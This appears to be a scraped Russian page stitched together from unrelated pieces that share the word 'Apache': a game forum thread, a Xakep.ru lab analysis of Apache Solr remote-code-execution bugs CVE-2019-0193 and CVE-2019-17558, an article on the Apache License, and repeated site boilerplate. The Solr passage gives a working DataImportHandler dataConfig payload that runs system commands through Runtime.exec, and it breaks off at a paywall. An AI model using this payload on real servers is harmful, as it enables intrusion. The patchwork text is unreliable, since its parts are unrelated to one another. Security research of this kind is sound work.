Коды на апач русский синдром
Апач 2 — Русский синдром |
3.3.2010, 11:02 Сообщение | |
……… Перл скайпа……… …..(ex серьезный дядя)….. Обратиться по нику Группа: Creators Из: SmallGames.WS Спасибо сказали: 10374 раза Меня зовут:Кирюха | Международный терроризм не дремлет! А значит нам — настоящим рыцарям неба — опять предстоит запрыгнуть в кабину вертолета «Апач» и продолжить борьбу с врагом. Но на сей раз ситуация принимает неожиданный оборот. Действие игры развернется ни где-нибудь, а на просторах нашей родной страны! Особенности игры: Размер игры: 127 Мб |
Ответов
(1 — 3)
3.3.2010, 11:02 Сообщение | |
4.3.2010, 20:22 Сообщение | |
Новичок Обратиться по нику Группа: Пользователи Сообщений: 4 Из: bbb Спасибо сказали: 2 раза | Хорошо вспомнить старое.Спасибо |
8.3.2010, 11:49 Сообщение | |
Новичок Обратиться по нику Группа: Пользователи Сообщений: 4 Из: регион12 Спасибо сказали: 1 раз Меня зовут:Марат | а можна выложить на летит бите или депозите , с сервера скачать не получаеться |
12.3.2010, 20:01 Сообщение | |
Игрок Обратиться по нику Группа: Комментатор Из: симферополь Спасибо сказали: 9 раз Меня зовут:света | виснет комп при запуске диска.В чем может быть проблема? |
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей:
Источник
Игровые форумы AGFC
Крупнейшее российское
игровое сообщество.
Десятки тысяч участников,
миллионы полезных
тем и сообщений.
Travel, Inc.
Портал, посвященный
адвенчурам и RPG.
Специализированные
новости и рецензии,
аналитические статьи.
Grand Theft AG
Самый крупный сайт
в России о серии GTA
и ее «детях» —
Mafia, Driv3r и т.п.
Новости, прохождения,
моды, полезные файлы.
Геройский уголок
Лидер среди сайтов
по играм сериала
Heroes of Might & Magic.
Внутри — карты, советы,
турниры и свежие
новости о Heroes 5.
Летописи Тамриэля
Один из крупнейших
в мире ресурсов
по играм серии
The Elder Scrolls.
Если вы любите Arena,
Daggerfall, Morrowind
и Oblivion —
не проходите мимо!
ГотикAG
Проект, посвященный
известному немецкому
RPG-сериалу Gothic.
Новости, моды, советы,
прохождения и еще
несколько тонн
полезной информации.
Wasteland Chronicles
Портал для любителей
постапокалиптических RPG.
В меню: все части
Fallout, Metalheart, The Fall,
Wasteland, Койоты и Ex Machina.
Magic Team
Ресурс, посвященный
вскрытию игровых
ресурсов и форматов.
Помимо советов
и описаний, содержит
программы от Magic Team,
позволяющие вытащить
данные из сотен игр.
Absolute Top + Мuзейm
Сайт ежегодного
голосования AG, где
читатели и редакция
определяют лучшие игры.
Архив старых голосований
работает круглосуточно
и без выходных.
Battles.ru
Выдалась свободная минутка?
Порадуйте себя забавными
Flash-играми!
На серверe Battles.ru
каждый найдет себе
милое развлечение.
Вольный Стрелок
Портал, посвященный
стратегическим играм
всех мастей и калибров.
Новости, рецензии,
скриншоты, файлы.
Проект временно заморожен.
Skive: Тенденции
компьютерного игростроения
Небанальные измышления
нашего коллеги Скайва
о том, что ждет
игровую индустрию.
Архив выпусков охватывает
без малого четыре года.
Проект временно заморожен.
WAP.AG.RU
Игровой сайт в вашем
мобильном телефоне.
Бесплатный доступ к статьям,
новостям, кодам и прохождениям.
Где угодно, когда угодно.
Без компьютера.
RF Online
Бесплатная футуристическая MMORPG.
Сворачивание персонального меню
доступно только зарегистрированным
пользователям.
Выбор, заливка и редактирование
аватара доступно только
зарегистрированным пользователям.
Напомните себе пароль, если забыли.
Переписка в пределах AG.ru доступна
только зарегистрированным
пользователям.
Персональное указание количества
обновлений AG.ru доступно
только зарегистрированным пользователям.
Регистрация на AG, форумах и т.д.
Настройки вашего профиля,
сайта, форумов и т.д.
Демо-версия.
Сервисы и бонусы, доступные
нашим VIP-пользователям.
Которым можете стать и вы.
А здесь будет кое-что интересненькое…
Количество агрублей
на вашем счету.
Демо-версия.
Открыть страницу с
вы не похожи на спам-бота 🙂 Внимание! Использование материалов сайта «Absolute Games» возможно только с письменного разрешения редакции. В противном случае любая перепечатка материалов сайта (даже с установленной ссылкой на оригинал) является нарушением Федерального закона РФ «Об авторском праве и смежных правах» и влечет за собой судебное разбирательство в соответствии с Гражданским и Уголовным кодексами Российской Федерации. |
Коллекция GameArt | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Источник
Недавно исследователи нашли две крупные уязвимости в опенсорсной платформе полнотекстового поиска Apache Solr. Первый баг связан с некорректной обработкой шаблонов Velocity, второй кроется в модуле импорта баз данных. Эксплуатация любого из них приводит к удаленному выполнению команд, поэтому их статус — критический.
Solr написан на Java и основан на поисковом движке Apache Lucene. Его применяют для поиска по текстам, подсветки результатов, фасетного поиска, динамической кластеризации и прочего. Solr хорошо масштабируется и успел стать одним из самых популярных поисковых движков.
Первая уязвимость — CVE-2019-17558. Она существует благодаря возможности перезаписи конфигурации, что позволяет использовать кастомные шаблоны, в которых можно выполнять произвольные системные команды. Баг затрагивает все версии Apache Solr, начиная с 5.0.0 и заканчивая 8.3.1.
Вторая уязвимость — CVE-2019-0193. Она находится в модуле DataImportHandler. Злоумышленник может передать полезную нагрузку в параметре dataConfig при помощи запроса GET к функции импорта конфигурации БД. Обнаружил баг исследователь из Veracode Михаил Степанкин. Уязвимость затрагивает все версии Apache Solr до 8.2.0.
Стенд
Для начала поднимем стенд, на котором будем препарировать баги. Чтобы сэкономить время, возьмем версию, которая уязвима перед обоими эксплоитами, — 8.1.1. Здесь, как обычно, два пути. Один — использовать готовый контейнер Docker, он подойдет, если ты не планируешь морочиться с отладкой и копаться во внутренностях Solr. Для этого воспользуемся репозиторием vulhub. Все, что требуется, — это пара файлов docker-compose.xml: для CVE-2019-0193 и для CVE-2019-17558. Сохраняем их в отдельные папки и запускаем с помощью команды
docker-compose up -d
Контейнер Docker для тестирования уязвимости CVE-2019-0193
Теперь вернемся ко второму варианту стенда (я буду использовать в статье именно его). На самом деле он не сильно сложнее. Сначала скачиваем с официального сайта необходимую версию Solr — solr-8.1.1-src.tgz. Распаковываем архив и переходим в директорию bin. Теперь, чтобы запустить сервер, достаточно выполнить скрипт solr.cmd для Windows или solr для Linux и macOS.
solr start
Сервер стартует на порте 8983.
Стенд Apache Solr 8.1.1 для тестирования уязвимостей
Однако нам еще понадобится возможность отладки, поэтому пока притормозим Solr.
solr stop -all
Для дебага я буду использовать IntelliJ IDEA. Для начала воспользуемся утилитой Ant, чтобы сгенерировать необходимое окружение.
ant ivy-bootstrap
ant idea
Переходим в папку solr и выполняем еще одну команду.
ant server
Подготовка окружения для отладки Apache Solr
После того как команды успешно отработают, можно открывать проект в IDEA. Теперь укажем параметры запуска сервера. Для этого добавим новую конфигурацию удаленной отладки. Укажем порт и выберем server в качестве module classpath.
Конфигурация для удаленной отладки в IDEA
Обрати внимание на строку Command line arguments for remote JVM. Ее нужно добавить в качестве аргумента в команду для запуска сервера.
solr start -f -a «-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8983»
После этого запускаем отладчик, и стенд готов.
Готовый стенд Apache Solr с возможностью отладки
Осталось только создать два тестовых экземпляра ядра (core), чтобы анализировать уязвимости. Для бага в DataImportHandler я буду использовать конфиг example-DIH.
solr create_core -c test -d ../example/example-DIH/solr/db
Тестовый экземпляр для анализа CVE-2019-0193
А для бага в обработчике шаблонов достаточно дефолтного конфига.
solr create_core -c vel
Переходим к обзору уязвимостей, начну в хронологическом порядке.
Уязвимость в DataImportHandler
Во многих поисковых приложениях контент для индексирования хранится в структурированном хранилище данных, например в реляционной СУБД. Data Import Handler (или DIH) предоставляет механизм для импорта содержимого из такого хранилища данных и его индексации. В нем есть функция, которая отправляет всю конфигурацию БД одним запросом с параметром dataConfig. Режим дебага DIH позволяет удобно отлаживать такую конфигурацию.
Но есть и подводные камни — DIH-конфигурация может содержать скрипты, а это потенциальный вектор для атаки. Точнее, это прямой путь к выполнению произвольного кода! ???? Если заглянешь в документацию к ScriptTransfer, то увидишь, что, хотя функции-трансформаторы и пишутся по дефолту на JavaScript, в них можно использовать вставки кода на Java.
Пример использования ScriptTransformer с кодом на Java
Также обрати внимание на то, как вызывается созданный трансформер.
Используя тривиальный метод getRuntime().exec(), можно накидать тело функции rce, которая будет выполнять любой код.
<dataConfig>
<script><![CDATA[
function rce() {
java.lang.Runtime.getRuntime().exec(«calc»);
}
]]></script>
Остается вопрос о том, в каком контексте эту функцию можно вызвать. Для этих целей нам понадобится источник валидных данных. Так как возиться с поднятием своей БД совсем не хочется, заглянем еще раз в документацию. К нашему счастью, DataImportHandler поддерживает целую вязанку разных источников. Например, URLDataSource, который получает данные из определенного URL.
<dataConfig>
<dataSource type=»URLDataSource» />
<script><![CDATA[
function rce() {
java.lang.Runtime.getRuntime().exec(«calc»);
}
]]></script>
В качестве обработчика данных я буду использовать обычный PlainTextEntityProcessor, который просто читает все содержимое в поле plainText. Но это абсолютно не важно, главное — использовать в качестве трансформера нашу функцию.
<dataConfig>
<dataSource type=»URLDataSource» />
<script><![CDATA[
function rce() {
java.lang.Runtime.getRuntime().exec(«calc»);
}
]]></script>
<document>
<entity processor=»PlainTextEntityProcessor» name=»x» url=»https://abc.com/» transformer=»script:rce» />
</document>
</dataConfig>
Здесь я получаю все содержимое страницы https://abc.com/ и затем применяю к нему функцию rce.
Включим режим отладки конфигурации DIH и отправим полученный пейлоад. Если сейчас перехватить запрос, то он будет передан в параметре dataConfig.
Выполнение произвольного кода в Apache Solr через DataImportHandler
Установим в отладчике брейк-пойнт на вызов метода инициализации ScriptTransformer.
org.apache.solr.handler.dataimport.ScriptTransformer#initEngine
И видим, что по умолчанию для трансформеров используется JavaScript. А движок, который выполняет парсинг кода на JS, — Nashorn.
Отладка инициализации ScriptTransformer
/solr-8.1.1/solr/contrib/dataimporthandler/src/java/org/apache/solr/handler/dataimport/ScriptTransformer.java
44: public class ScriptTransformer extends Transformer {
…
65: private void initEngine(Context context) {
66: String scriptText = context.getScript();
67: String scriptLang = context.getScriptLanguage();
…
72: ScriptEngineManager scriptEngineMgr = new ScriptEngineManager();
73: ScriptEngine scriptEngine = scriptEngineMgr.getEngineByName(scriptLang);
…
86: try {
87: scriptEngine.eval(scriptText);
Из документации можно узнать, что Nashorn позволяет обращаться к стандартным пакетам и классам Java.
Вызов калькулятора через java.lang.Runtime.getRuntime в Nashorn
Далее выполнение кода переходит в
org.apache.solr.handler.dataimport.ScriptTransformer#transformRow
Здесь и вызывается наша функция.
/solr-8.1.1/solr/contrib/dataimporthandler/src/java/org/apache/solr/handler/dataimport/ScriptTransformer.java
44: public class ScriptTransformer extends Transformer {
…
48: @Override
49: public Object transformRow(Map<String, Object> row, Context context) {
50: try {
51: if (engine == null)
52: initEngine(context);
53: if (engine == null)
54: return row;
55: return engine.invokeFunction(functionName, new Object[]{row, context});
Момент вызова функции rce
Таким образом, можно выполнить любые команды в системе. Это поведение, разумеется, открывает серьезную брешь в безопасности, поэтому с версии 8.2.0 Apache Solr по дефолту не позволяет использовать загрузку напрямую через веб-интерфейс из параметра dataConfig. Чтобы такой способ заработал, теперь нужно установить настройку enable.dih.dataConfigParam в true.
Продолжение доступно только участникам
Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», увеличит личную накопительную скидку и позволит накапливать профессиональный рейтинг Xakep Score!
Подробнее
Вариант 2. Открой один материал
Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя!
Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.
Я уже участник «Xakep.ru»
Источник
Текущая версия страницы пока не проверялась опытными участниками и может значительно отличаться от версии, проверенной 15 мая 2019;
проверки требуют 3 правки.
Для этого термина существует аббревиатура «ASL», которая имеет и другие значения: см. ASL.
Лицензия Apache (англ. Apache License[Прим. 1]) — лицензия на свободное программное обеспечение Apache Software Foundation.
История версий[править | править код]
Apache License 1.0 — оригинальная лицензия, которая распространяется только на старые версии пакетов (например, версия 1.2 веб-сервера)[1].
Apache License 1.1 была одобрена ASF в 2000 году. Отличие от версии 1.0 описано в пункте «о рекламе (advertising clause)» (раздел 3 лицензии 1.0): производные продукты уже не обязаны использовать атрибуцию в своих рекламных материалах, необходимо лишь указывать её в своей документации[1].
Apache License 2.0[править | править код]
В январе 2004 года ASF утвердила Apache License 2.0. Данная лицензия работает, по существу, как MIT, BSD и Apache License 1.1, с некоторыми дополнительными преимуществами[2]. Например, лицензирование производных работ в рамках других лицензий разрешается при соблюдении условий Apache License 2.0.
Основные изменения: упрощение использования лицензии для не ASF-проектов, улучшение совместимости с GPL, возможность использовать ссылку на описание лицензии вместо того, чтобы описывать её в каждом файле[1].
Условия лицензирования[править | править код]
Подобно любой другой лицензии на свободное программное обеспечение, лицензия Apache даёт пользователю право использовать программное обеспечение для любых целей, свободно изменять и распространять изменённые копии, за исключением названия[Прим. 2].
Данная лицензия не ставит условием неизменность лицензии распространения программного обеспечения, и не настаивает даже на сохранении его бесплатного и открытого статуса. Единственным условием, накладываемым лицензией Apache, является информирование получателя о факте использования исходного кода. Таким образом, в противоположность copyleft-лицензиям, получатель модифицированной версии не обязательно получает все права, изначально предоставляемые лицензией Apache.
При распространении программного обеспечения необходимо поместить следующие файлы в корневой каталог:
- LICENSE — файл, содержащий копию текста лицензии Apache;
- NOTICE — текстовый файл, перечисляющий все библиотеки, лицензированные под лицензией Apache вместе с именами их создателей.
В каждом лицензируемом файле должна быть сохранена вся исходная информация о копирайтах или патентах, в каждый изменённый файл должна добавляться информация о проведённых изменениях.
Совместимость с GPL[править | править код]
Фонд Free Software Foundation объявил все версии лицензии Apache несовместимыми со второй версией GPL[3].
Apache Software Foundation, начиная с 2004 года, настаивает на своём праве решать вопрос совместимости Apache лицензии с GPL[4].
Согласно Free Software Foundation, GPLv3 совместима с Apache License v2.0[3][5]. Как следствие, разработчики всегда имеют возможность свои программы под Apache License v2.0 перевести под GPL v3.0, чтобы быть уверенными в том, что производные их разработок (форки) останутся свободными. Однако смена лицензии с GPL на Apache невозможна, поэтому совместимость односторонняя.
Примечания[править | править код]
Источники
Литература[править | править код]
Andrew M. St. Laurent. Understanding Open Source and Free Software Licensing. — 2004. — 207 с. Архивная копия от 29 октября 2013 на Wayback Machine
Ссылки[править | править код]
- Licenses (англ.). Apache. — Текст официальной лицензии Apache License v2.0, v1.1 и v1.0. Дата обращения 7 августа 2010. Архивировано 29 февраля 2012 года.
- Apache Public Licenses (англ.). OSI. — Текст официальной лицензии Apache License v2.0, v1.1 и v1.0. Дата обращения 7 августа 2010. Архивировано 29 февраля 2012 года.
- Перевод лицензии Apache 2.0 на русский язык. Дата обращения 19 марта 2012. Архивировано 19 мая 2012 года.
Источник
Игровые форумы AGFC
Крупнейшее российское
игровое сообщество.
Десятки тысяч участников,
миллионы полезных
тем и сообщений.
Travel, Inc.
Портал, посвященный
адвенчурам и RPG.
Специализированные
новости и рецензии,
аналитические статьи.
Grand Theft AG
Самый крупный сайт
в России о серии GTA
и ее «детях» —
Mafia, Driv3r и т.п.
Новости, прохождения,
моды, полезные файлы.
Геройский уголок
Лидер среди сайтов
по играм сериала
Heroes of Might & Magic.
Внутри — карты, советы,
турниры и свежие
новости о Heroes 5.
Летописи Тамриэля
Один из крупнейших
в мире ресурсов
по играм серии
The Elder Scrolls.
Если вы любите Arena,
Daggerfall, Morrowind
и Oblivion —
не проходите мимо!
ГотикAG
Проект, посвященный
известному немецкому
RPG-сериалу Gothic.
Новости, моды, советы,
прохождения и еще
несколько тонн
полезной информации.
Wasteland Chronicles
Портал для любителей
постапокалиптических RPG.
В меню: все части
Fallout, Metalheart, The Fall,
Wasteland, Койоты и Ex Machina.
Magic Team
Ресурс, посвященный
вскрытию игровых
ресурсов и форматов.
Помимо советов
и описаний, содержит
программы от Magic Team,
позволяющие вытащить
данные из сотен игр.
Absolute Top + Мuзейm
Сайт ежегодного
голосования AG, где
читатели и редакция
определяют лучшие игры.
Архив старых голосований
работает круглосуточно
и без выходных.
Battles.ru
Выдалась свободная минутка?
Порадуйте себя забавными
Flash-играми!
На серверe Battles.ru
каждый найдет себе
милое развлечение.
Вольный Стрелок
Портал, посвященный
стратегическим играм
всех мастей и калибров.
Новости, рецензии,
скриншоты, файлы.
Проект временно заморожен.
Skive: Тенденции
компьютерного игростроения
Небанальные измышления
нашего коллеги Скайва
о том, что ждет
игровую индустрию.
Архив выпусков охватывает
без малого четыре года.
Проект временно заморожен.
WAP.AG.RU
Игровой сайт в вашем
мобильном телефоне.
Бесплатный доступ к статьям,
новостям, кодам и прохождениям.
Где угодно, когда угодно.
Без компьютера.
RF Online
Бесплатная футуристическая MMORPG.
Сворачивание персонального меню
доступно только зарегистрированным
пользователям.
Выбор, заливка и редактирование
аватара доступно только
зарегистрированным пользователям.
Напомните себе пароль, если забыли.
Переписка в пределах AG.ru доступна
только зарегистрированным
пользователям.
Персональное указание количества
обновлений AG.ru доступно
только зарегистрированным пользователям.
Регистрация на AG, форумах и т.д.
Настройки вашего профиля,
сайта, форумов и т.д.
Демо-версия.
Сервисы и бонусы, доступные
нашим VIP-пользователям.
Которым можете стать и вы.
А здесь будет кое-что интересненькое…
Количество агрублей
на вашем счету.
Демо-версия.
Открыть страницу с
вы не похожи на спам-бота 🙂 Внимание! Использование материалов сайта «Absolute Games» возможно только с письменного разрешения редакции. В противном случае любая перепечатка материалов сайта (даже с установленной ссылкой на оригинал) является нарушением Федерального закона РФ «Об авторском праве и смежных правах» и влечет за собой судебное разбирательство в соответствии с Гражданским и Уголовным кодексами Российской Федерации. |
Коллекция GameArt | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Источник